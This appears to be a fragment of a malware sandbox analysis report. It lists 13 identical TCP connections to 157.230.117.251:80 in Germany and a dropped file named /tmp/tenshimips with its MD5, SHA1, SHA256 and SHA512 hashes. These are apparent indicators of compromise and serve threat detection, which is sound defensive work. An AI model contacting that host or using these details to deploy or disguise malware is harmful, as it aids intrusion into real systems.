| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
Files
/tmp/tenshimips
| MD5 | 01e9b3351a20632ce2de4a219637711c |
| SHA1 | d46e0281e15a1ef4fec829351c47c0eacaf6ad5c |
| SHA256 | b99af4f05341cc3630e61fd747d5eb37d45dcf39253f67919a6a1e4bde92f3c2 |
| SHA512 | 33eba632764a2d267bede9278c55e26aac5653873a3b73943ce4a77bef6aa6395bd8fa334d5e3d65c4998fea1b049ffc47ac20c7e6898ec98309f1c45a96220f |